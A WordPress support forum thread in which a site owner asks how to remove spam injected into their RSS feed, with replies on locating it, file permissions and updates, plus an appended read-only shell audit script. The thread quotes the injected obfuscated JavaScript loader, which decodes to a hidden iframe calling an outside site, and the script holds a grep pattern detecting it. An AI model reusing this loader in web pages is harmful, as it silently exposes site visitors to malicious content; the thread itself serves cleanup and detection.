Repairing a hacker's addition to RSS feed.

  • Recently I noticed that my RSS feeds were corrupting. Looking into the feed and using Feedburner's validator, I noticed a spam element had been added to the very end of the RSS feed. (An example is noted below.) When I uninstalled, and re-installed all the posts, the problem went away, only to reappear the next day.

    I’m working to boost security to the site, but need to know what file I might look for, to eliminate this from the RSS feed.

    Example code from my RSS feed:
    “# </rss>
    # <!– ~ –><script language=javascript>document.write(unescape(‘%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E’));dF(‘%264Dtdsjqu%2631mbohvbhf%264Ekbwbtdsjqu%264F%261E%261Bepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00xxx/gsff31/dpn0qpsubm0joefy/qiq%264Gbgg%264Esb%7Bfdd%2638%2631xjeui%264E%26381%2638%2631ifjhiu%264E%26381%2638%2631gsbnfcpsefs%264E%26381%2638%264F%264D0jgsbnf%264F%2633%263%3A%261E%261B%264D0tdsjqu%264F1’)</script><!– ~ –>”

Viewing 3 replies - 1 through 3 (of 3 total)
  • whooami



    That's not just in your feed; view your source on the front page of your site.

    Start by checking your current theme’s footer.php for the javascript.

    If it's not in there, check all the other files.

    … boost security ..
    1. In the future, you want to ensure your files have safe and sane permissions:

    directories: 755
    files: 644

    2. Pay attention to your site.

    3. Stay on top of updates. You are presently using 2.2.2 — that's not current.




    After looking closer – you are using frames..

    This is WP generated:

    and there is no javascript.,com_frontpage/Itemid,1/

    That is your front page, and clearly has the js at the bottom.

    What this suggests is that whatever you are using for your “portal” is where the problem lies.

    This post helped solve my problem too—and I’m going to now make sure all of our permissions are set correctly.

    Just to make sure I understand this: I’ll set every directory (folder) to 755. I’ll set every individual file to 644.

    Are there any exceptions? For example, are there typically plugins that need to have looser permissions? And if so, does that mean setting the plugin folder itself and the wp-content folder to those same permissions?
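
The checks suggested in the replies above (search the theme and other files for the injected JavaScript, inspect the end of the feed, and keep permissions at 755/644), written out as a read-only shell audit. This is an added example, not part of the original thread; the WordPress path and the saved feed file passed as arguments are assumptions.

```bash
#!/bin/sh
# Added example (not from the thread): read-only audit of a WordPress tree.
# The paths passed in are assumptions; nothing here modifies any file.

# Files containing the loader seen in the feed: document.write(unescape(
# followed by URL-encoded "<script" (%3C%73%63%72%69%70%74).
scan_injected() {
    grep -rliE 'document\.write\(unescape\(.{0,4}%3c%73%63%72%69%70%74' "$1" | sort
}

# Anything that follows the closing </rss> tag in a saved copy of the feed.
# A well-formed feed has nothing but whitespace there.
feed_trailer() {
    awk 'found && NF { print }
         /<\/rss>/ { found = 1; sub(/.*<\/rss>/, ""); if (NF) print }' "$1"
}

# Files and directories writable by group or other, i.e. looser than the
# 644 (files) / 755 (directories) recommended in the thread.
loose_perms() {
    find "$1" \( -type f -o -type d \) \( -perm -020 -o -perm -002 \) | sort
}

# Usage: sh audit.sh /path/to/wordpress [saved-feed.xml]
if [ "$#" -gt 0 ]; then
    echo "== files containing the injected loader =="; scan_injected "$1"
    echo "== group/other-writable paths ==";          loose_perms "$1"
    if [ -n "${2:-}" ]; then
        echo "== content after </rss> =="; feed_trailer "$2"
    fi
fi
```

A file reported by `scan_injected` shows where the script currently sits, not how it was written there, so compare flagged files against a clean copy of the same theme or plugin release.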


